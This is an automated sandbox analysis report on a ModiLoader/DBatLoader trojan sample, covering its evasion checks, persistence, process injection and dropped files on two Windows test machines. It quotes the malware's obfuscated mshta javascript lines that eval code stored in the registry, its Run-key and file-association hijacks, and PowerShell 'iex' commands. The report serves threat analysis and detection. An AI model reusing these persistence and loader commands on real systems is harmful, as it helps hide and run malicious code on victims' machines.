Malware Analysis Report

2024-10-23 19:35

Sample ID 240505-sg5zmsgf27
Target 183da5248aa31d95f9462a9b49c50b36_JaffaCakes118
SHA256 252f271550eb6a0ec533597feb9d63f5ef308388935a4734159b1d60ec0c878e
Tags
modiloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

252f271550eb6a0ec533597feb9d63f5ef308388935a4734159b1d60ec0c878e

Threat Level: Known bad

The file 183da5248aa31d95f9462a9b49c50b36_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

ModiLoader, DBatLoader

Process spawned unexpected child process

Looks for VirtualBox drivers on disk

Looks for VirtualBox Guest Additions in registry

ModiLoader Second Stage

Checks for common network interception software

Looks for VMWare Tools registry key

Deletes itself

Checks computer location settings

Drops startup file

Checks BIOS information in registry

Maps connected drives based on registry

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

Unsigned PE

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-05 15:06

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-05 15:06

Reported

2024-05-05 15:09

Platform

win7-20240215-en

Max time kernel

149s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VirtualBox drivers on disk

evasion
Description Indicator Process Target
File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2d7d1.lnk C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:l0RPVr=\"rDrGQtc\";nN0=new%20ActiveXObject(\"WScript.Shell\");u02ncvHt=\"Do4Ay\";h8e0cL=nN0.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\atqjps\\\\xawh\");QtZM07=\"4VU9wy\";eval(h8e0cL);y3SuPU=\"UqA\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:g6tyH=\"y7HT9d\";iF6=new%20ActiveXObject(\"WScript.Shell\");ENf8EDDD=\"Y\";Tql55a=iF6.RegRead(\"HKCU\\\\software\\\\atqjps\\\\xawh\");L9bxQ8gO=\"INmisg\";eval(Tql55a);s41kOqzDC=\"o37\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\ed3e8\\d468b.lnk\"" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\0f739\shell\open\command C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\0f739\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:sIU24T=\"q0p8ok\";M9X=new ActiveXObject(\"WScript.Shell\");ta15Db=\"nwpJDD\";q4x8DW=M9X.RegRead(\"HKCU\\\\software\\\\atqjps\\\\xawh\");EHB1pLz=\"lD\";eval(q4x8DW);L2GzM=\"Xtz8\";\"" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\.cc93a6 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\.cc93a6\ = "0f739" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\0f739 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\0f739\shell C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\0f739\shell\open C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1728 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe
PID 2232 wrote to memory of 2420 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2420 wrote to memory of 2624 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2624 wrote to memory of 2904 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:iqyPK8h="7SKSF";D5J6=new%20ActiveXObject("WScript.Shell");d4fAwY="BsV3K";x2Wjx8=D5J6.RegRead("HKLM\\software\\Wow6432Node\\gzaHwY\\HRdnfc1fd");OxxP32="EtHrq";eval(x2Wjx8);nM5GZPq="OT";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:mrqlf

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\ed3e8\bc0ec.bat

MD5 c9726b1023d08f87d7c310ef440fc21a
SHA1 e121739a7d5fd0bd5e0a08827105a41798195629
SHA256 009c0ef73332c5aae4e96ba2013e33cda30f312c604c5b1e768c190a522160fc
SHA512 571d0720f495a92114cdce0abbf951bd3ac6f66394adc88964c3870feb2552640290d65bf739c9e844e4f0c33ddbda9e39f6e66cfaad8a4b35a210df05efe1b0

C:\Users\Admin\AppData\Roaming\158f4\93aca.cc93a6

MD5 224a96698095259ab707c64e8a2e5d18
SHA1 81e13fecd84dd76b74072f7b63c2d8713a5b80cf
SHA256 de91e37447860f1ae60170bcd269090568a29f45354db3fbed93087efd147ea9
SHA512 fb5afc8ed1a420644c254a009936a77ffe6f1afd7b7169e46095444ac5217dac805319ba417a2ad4b450a2a55f9a99b84677ced81420a284021a692668e3e296

C:\Users\Admin\AppData\Local\ed3e8\d468b.lnk

MD5 625f54a2fef23c3a3d59e2c950ba65c6
SHA1 0ac958e936b708c89a364d56513b85fa89b98b07
SHA256 c0bf9ed2ce41a218807ca8ed0ed6587fe2388d6e82bfa489f4d6f799cf662e6b
SHA512 a1f3b67b7eafa29f9a4925999aca67fa98fafb8dbe055b8d6d01e72402f4e0a3e8e8d283e39a1e3abb856ebf42dcceee74756bde9c0e16e7747c3389d1d1866f

C:\Users\Admin\AppData\Local\ed3e8\5cad4.cc93a6

MD5 8c5d76dc8913b4b9d779139bd98bc4aa
SHA1 8ecd0b54ac32c24bb3c1d06e5151295ce0ef09b4
SHA256 f6aa8866c2b49ba839275ebb0d0d17630ae63d20987d523037bd632575ae1330
SHA512 443b2be513599d9434168634de7fbf317aa637a0f5a89c4e6c80fd62fc68cf032a1ee6ae333f24de7701caf9e510f46ff5f0c83302266d748fa92bfb8bf2b242

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2d7d1.lnk

MD5 bebc26141e049d539319bb30b6b54d9e
SHA1 1d3d6261dc5cc68a1e7a9c718a8e177e3b5b31ea
SHA256 150bec976ac8a8e49819cb833b76a72d3e5452aece6c317c91e894a171347951
SHA512 85e16016a0e8d19c361a657f5605b38cf00e507b5f18cb58ed40ccb036266207a0558f418b7471c4fe3a1e1ba0234613b67933689c87fb26925cab629f593a8a

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-05 15:06

Reported

2024-05-05 15:09

Platform

win10v2004-20240419-en

Max time kernel

145s

Max time network

101s

Command Line

"C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2124 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe
PID 1680 wrote to memory of 944 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:SLXp58v="TNvv7Q4";t3C8=new%20ActiveXObject("WScript.Shell");cU2ai="xEkfOZ";D8SnO=t3C8.RegRead("HKLM\\software\\Wow6432Node\\JoCuqBt1I\\VvwOn0Rh8");GG1JXu5="42oXN";eval(D8SnO);Tu0ZNC1LQ="SUq";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:bxmapity

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jtj2hegb.nwc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
